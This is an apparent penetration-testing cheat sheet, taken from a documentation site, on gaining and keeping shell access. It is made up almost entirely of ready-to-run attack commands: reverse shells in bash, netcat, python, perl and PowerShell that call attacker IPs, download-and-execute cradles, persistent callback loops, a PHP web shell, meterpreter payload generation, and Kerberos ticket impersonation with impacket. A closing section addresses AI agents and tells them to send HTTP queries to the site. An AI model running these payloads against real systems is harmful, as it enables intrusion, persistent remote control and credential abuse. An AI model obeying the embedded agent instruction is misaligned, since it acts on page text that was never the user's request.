# Shell & Stabilization

## Reverse Shell

{% embed url="<https://www.revshells.com/>" %}

### Linux

```bash
#Bash
bash -c 'bash -i >& /dev/tcp/<ip>/443 0>&1'

#netcat
nc <ip> <port> -e /bin/bash
nc <ip> <port> -e cmd.exe
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ip> 443 >/tmp/f

#php 
#(with proc_open & proc_close - shell.phar)
<?php

$descriptorspec = array(
0 => array("pipe", "r"),
1 => array("pipe", "w"),
2 => array("file", "/tmp/error-output.txt", "a")
);

$cwd = "/tmp";
$env = array("some_option" => "aeiou");
$process = proc_open("sh", $descriptorspec, $pipes, $cwd, $env);
if (is_resource($process)) {
fwrite($pipes[0], "nc 127.0.0.1 9001");
fclose($pipes[0]);
echo stream_get_contents($pipes[1]);
fclose($pipes[1]);

$return_value = proc_close($process);
echo "command returned $return_value\n";
}
?>


#python injection input
__import__('os').system('whoami')

#python.py
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.27",2323));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")

#perl
perl -e 'use Socket;$i="10.10.14.27";$p=2323;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("sh -i");};'

```

### Windows

nc64.exe

{% embed url="<https://github.com/vinsworldcom/NetCat64/releases>" %}

```
nc64.exe -e cmd.exe <IP> 443
```

{% embed url="<https://github.com/samratashok/nishang>" %}

<pre><code>#Execute file.ps1
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File  shell.ps1


#Execute file remotely
IEX (New-Object System.Net.WebClient).DownloaString('http://&#x3C;attacker ip>/shell.ps1')
<strong>
</strong><strong>
</strong><strong># Invoke-PowershellTcpOneLine.ps1
</strong># Invoke-PowerShellTcp.ps1

<strong># 1. setup python http server
</strong><strong># 2. execute
</strong>
powershell.exe IEX(New-Object Net.WebClient).downloadString('http://&#x3C;ip attacker>/Invoke-PowerShellTcp.ps1")
#or
powershell iwr http://&#x3C;ip attacker>/shell.ps1 -o C:/Windows/Tasks/shell.ps1

# encode payload

Cat Invoke-PowerShellTcpOneLine.ps1 | iconv -t utf-16le |base64 -w 0

powershell -enc &#x3C;encode payload>

# Execute command without crashing the previous shell
<strong># 1. pwn.ps1
</strong>
Invoke-WebRequest -Uri http://&#x3C;attacker ip> -OutFile C:\Windows\Tasks\shell.exe;
Start-Process -NoNewWindow -FilePath C:\Windows\Tasks\shell.exe

# 2. execute this command
powershell -ep bypass -c "iex(iwr -uri &#x3C;attacker ip>/pwn.ps1 -usebasicparsing)"

# note: you could change the payload in the pwn.ps1 if your payload doesn't work.

</code></pre>

## Shell Stabilization (Linux)

When?

```
$ tty
not a tty
```

Note:

> \[ctrl + c] only work if machine has bash as the default shell
>
> use "clear" instead.

```bash
python -c 'import pty; pty.spawn("/bin/bash")'
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/tmp
export TERM=xterm-256color
alias ll='clear ; ls -lsaht --color=auto'
```

Keyboart Shortcut: \[Ctrl + Z] (Backgroud Process.)

```bash
stty raw -echo ; fg ; reset
stty columns 200 rows 200
```

## Persistence Reverse Shell

Important to run persistence shell before execute anything.

### Linux

```bash
while :; do setsid bash -i &>/dev/tcp/<ATTACKER IP>/<LPORT> 0>&1; sleep 60; done &>/dev/null &


nohup bash -c "while :; do bash -i >& /dev/tcp/<ATTACKER IP>/<LPORT> 0>&1; sleep 60; done" &
```

### Windows

need to upload **nc.exe**

```
start cmd /C "for /L %n in (1,0,10) do ( nc.exe <ATTACKER IP> <PORT> -e cmd.exe & ping -n 60 127.0.0.1 )"
```

## Web Shell

### PHP

* <https://github.com/ivan-sincek/php-reverse-shell>  (compatible for windows, linux, mac)
* <https://github.com/flozz/p0wny-shell>

cmd --> shell.php

```
<?php
echo system($_REQUEST['cmd']);
?>
```

$URL/shell.php?cmd=id

note: the simple way is using burp suite repeater to do a command.

change GET request to POST request to get a better input experience.

### IIS

* ver 8.5 --> <https://github.com/jivoi/pentest/blob/master/shell/insomnia_shell.aspx>

### ASPX run Shellcode

```
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.10.1 LPORT=443 -f aspx

or

msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.10.10.1 LPORT=443 -f aspx
```

### Dig deeper

<https://github.com/tennc/webshell>

## Windows NT Authority shell from Administrator

```
psexec.exe -i -s cmd.exe
psexec.exe -i -s %SystemRoot%\system32\cmd.exe
```

## Shell to another user in Active Directory

note: powershell

**Convert credentials**

```powershell
$pw = ConvertTo-SecureString "<password>" -AsPlainText -Force
$creds = New-Object System.Mangement.Automation.PSCredential "<username>", $pw
```

**Command**

```powershell
Invoke-Command -ComputerName 127.0.0.1 -cred $creds -SCriptBlock { whoami }

```

after login, run powerview.

## Shell with silver ticket

If the domain user has **`constrained delegation privileges`** you can use the -impersonate flag to request a ticket on behalf of another user

for example:

```
# example env
Target IP: 10.10.10.1
Domain: test.local
Service: www
Host Name: server01.test.local
Username: john
Password: password123
Impersonated User: Administrator
```

**Request ticket**

```
# username and password
python getST.py -spn www/server01.test.local -dc-ip 10.10.10.1 -impersonate Administrator test.local/john:password123
impacket-getST -spn www/server01.test.local -dc-ip 10.10.10.1 -impersonate Administrator test.local/john:password123


# NTLM Hash
python3 getST.py -spn www/dc.intelligence.htb -impersonate Administrator intelligence.htb/svc_int$ -hashes <ntlm hash>:<ntlm hash>
```

<figure><img src="/files/v1TLiuJ3eKLCzVZbwtW6" alt=""><figcaption><p>result from request ticket</p></figcaption></figure>

**Save ticket to env**&#x20;

```
export KRB5CCNAME=Administrator.ccache
```

**Login with ticket**

```
impacket-psexec -k -no-pass <domain>/Administrator@<domain controller>
impacket-psexec -k -no-pass intelligence.htb/Administrator@dc.intelligence.htb
```

## Login using Impacket (need local admin creds)

need creds login, try the next command below if you failed on the one command.

```
# test with crackmapexec smb

impacket-psexec <domain>/<username>@$IP
impacket-smbexec <domain>/<username>@$IP

# wmi port
impacket-wmiexec <domain>/<username>@$IP

# test with crackmapexec winrm (WinRM (port
5985)
evil-winrm -i $IP -u <username> -p <password>
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://hacker-mind.gitbook.io/hacker-mind/exploit/shell-and-stabilization.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.